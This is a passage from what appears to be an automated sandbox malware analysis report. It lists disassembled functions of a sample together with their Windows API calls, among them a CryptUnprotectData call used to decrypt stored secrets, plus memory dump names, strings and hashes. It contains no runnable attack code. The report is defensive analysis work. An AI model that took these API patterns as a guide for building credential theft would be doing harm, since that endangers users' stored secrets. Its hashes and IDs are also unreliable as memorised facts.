                              • Opcode Fuzzy Hash: 2ac7f57dbee9ba5420ccd759e54afd65c5f7ecbd9f49eae0c3ec9ecf75d8f2b8
                              • Instruction Fuzzy Hash: 43B2E6F360C604AFE3046E2DEC8567AB7E9EF94720F1A492DE6C4C3744EA3598058797
                              Function 00C6BD31 Relevance: 6.6, Strings: 4, Instructions: 1583COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Jm_$Rtgy$dpu$xKou
                              • API String ID: 0-1908264721
                              • Opcode ID: 35808c72787d475e39b94e064de5b91c31d9f77c4bf25fbb9d9db2a99538ffd6
                              • Instruction ID: 2dc02d374f5024342ddb02ba8f9be50b8dac32565393f48d06889a4bfe7661dc
                              • Opcode Fuzzy Hash: 35808c72787d475e39b94e064de5b91c31d9f77c4bf25fbb9d9db2a99538ffd6
                              • Instruction Fuzzy Hash: 23B206F3A0C2049FE3046F29EC8567ABBE9EF94720F1A4A3DE6C5C3744E67558018697
                              Function 00829030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,008151D4,40000001,00000000,00000000,?,008151D4), ref: 00829050
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 28aaa3427e7eecc809587d97519f8a5ea29d3631b14055b8ba90cbade01a0041
                              • Instruction ID: 61146dbc917f6af8115b4d29ea4f4c148fb47596a585a09c2ca0bc7fda26279c
                              • Opcode Fuzzy Hash: 28aaa3427e7eecc809587d97519f8a5ea29d3631b14055b8ba90cbade01a0041
                              • Instruction Fuzzy Hash: 821106B0204618FFDF00CF94E894FAA33A9FF89314F108448FA59CB250D771E9828BA0
                              Function 0081A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A23F
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00814F3E,00000000,?), ref: 0081A251
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A27A
                              • LocalFree.KERNEL32(?,?,?,?,00814F3E,00000000,?), ref: 0081A28F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 69f62616e21a0fc0edd36188bc2d4aec6ab6984d764635a0e66d6daa8dec6cc9
                              • Instruction ID: 5e563375a98328d03df6f3ff7d9e3df7422407d351a14b808639fa4c46ab10e9
                              • Opcode Fuzzy Hash: 69f62616e21a0fc0edd36188bc2d4aec6ab6984d764635a0e66d6daa8dec6cc9
                              • Instruction Fuzzy Hash: 831196B4641308AFEB15CF94CC95FAA77B9FB49B10F208458FA159F290C772A941CB50
                              Function 00827BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015FDB78,00000000,?,00830DF8,00000000,?,00000000,00000000), ref: 00827BF3
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827BFA
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015FDB78,00000000,?,00830DF8,00000000,?,00000000,00000000,?), ref: 00827C0D
                              • wsprintfA.USER32 ref: 00827C47
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 8c5b8eaf3e45409b6f3a292e4547f0bf573041cc8330a3fa237142a4e4d5760b
                              • Instruction ID: 1b1721ff67bae8709bdd2f7625928b7422c8957bd7bd492895a3a1db30d6e313
                              • Opcode Fuzzy Hash: 8c5b8eaf3e45409b6f3a292e4547f0bf573041cc8330a3fa237142a4e4d5760b
                              • Instruction Fuzzy Hash: 7A118EB1909228EBEB20CBA4EC45FA9BB78FB44711F100395F619E73D0D7741A808F50
                              Function 00C6D7BE Relevance: 5.3, Strings: 3, Instructions: 1583COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /R"#$A,y{$'6
                              • API String ID: 0-1578560285
                              • Opcode ID: c3f2f61e2fb9ebb6f04560fd0b6ece146a64806e3825492c57dc173b45193471
                              • Instruction ID: bb61cd35b31ba5cd307ebae04824399dc81ff8c0201f871a16e5c100e607d86f
                              • Opcode Fuzzy Hash: c3f2f61e2fb9ebb6f04560fd0b6ece146a64806e3825492c57dc173b45193471
                              • Instruction Fuzzy Hash: 47B2E4F390C2149FE314AE2DEC8567ABBE9EF94720F1A492DEAC4C3740E63558008797
                              Function 00823970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(0082E120,00000000,00000001,0082E110,00000000), ref: 008239A8
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00823A00
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: ee4ab6115a6702da89a13278d73259e94d6f7047a0b3ec4891b39e9c2a1961b2
                              • Instruction ID: a2f9e8c2e117154508907fe156d7db205d882a2c7f83c0a9ab70620c476a3622
                              • Opcode Fuzzy Hash: ee4ab6115a6702da89a13278d73259e94d6f7047a0b3ec4891b39e9c2a1961b2
                              • Instruction Fuzzy Hash: F241E670A00A289FDB24DB58DC95B9BB7B5FB48702F4041D8A619EB2D0E7B16EC5CF50
                              Function 0081A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0081A2D4
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0081A2F3
                              • LocalFree.KERNEL32(?), ref: 0081A323
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 91925d89e90fa8bcfbd2b9bc1bfb64102c33c2cf3894cbe207a36a20b3c51ba0
                              • Instruction ID: 638a599144b36c18c277cd55c480f0b6144597f682a59749cf5db557231c1c59
                              • Opcode Fuzzy Hash: 91925d89e90fa8bcfbd2b9bc1bfb64102c33c2cf3894cbe207a36a20b3c51ba0
                              • Instruction Fuzzy Hash: 1111A5B8A00209EFCB04DFA8D985AAEB7B9FF89300F104559ED15AB350D770AE51CB61
                              Function 00C727B0 Relevance: 4.1, Strings: 2, Instructions: 1604COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0i$'K/
                              • API String ID: 0-2984406571
                              • Opcode ID: b805caebdd3f22d885c3aac6365ce9b10512d6123e71ce0e2d155590eb670420
                              • Instruction ID: b5db91c65652c4b7834468f15030edf009b0fb6c7e716685e8d21d435963db51
                              • Opcode Fuzzy Hash: b805caebdd3f22d885c3aac6365ce9b10512d6123e71ce0e2d155590eb670420
                              • Instruction Fuzzy Hash: DDB227F360C2049FE304AE2DEC8567AFBE5EFD4720F1A893DE6C487744EA3558058696
                              Function 00884BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?$__ZN
                              • API String ID: 0-1427190319
                              • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                              • Instruction ID: 41edb99a7aa50292ffcd79ead91b14099a717544268c7f26eacfb9b1d9756257
                              • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                              • Instruction Fuzzy Hash: 76723472908B159BD714EF18C89066ABBE2FFD5320F598A1DF8A5DB291D370DC41CB82
                              Function 00C17153 Relevance: 2.7, Strings: 2, Instructions: 199COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Qq=$g=}
                              • API String ID: 0-2701108894
                              • Opcode ID: e83e1dcb9d28d531a38eced25b097cf0bca556c2a469e13d67593eafd528dc60
                              • Instruction ID: 2e3d611c02cd99b118f6a54a3d595a6696e6fc67513a0f6e010f5452ad2ce582
                              • Opcode Fuzzy Hash: e83e1dcb9d28d531a38eced25b097cf0bca556c2a469e13d67593eafd528dc60
                              • Instruction Fuzzy Hash: 4E515AF7E587185BE304693DEC993297A96CBD0320F2B833DDA9897BC8ED3958054281
                              Function 00865DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: xn--
                              • API String ID: 0-2826155999
                              • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                              • Instruction ID: 86e3dc768efb9fc4811518acc1d11f1db2197823874dcd63d4b31a42057db342
                              • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
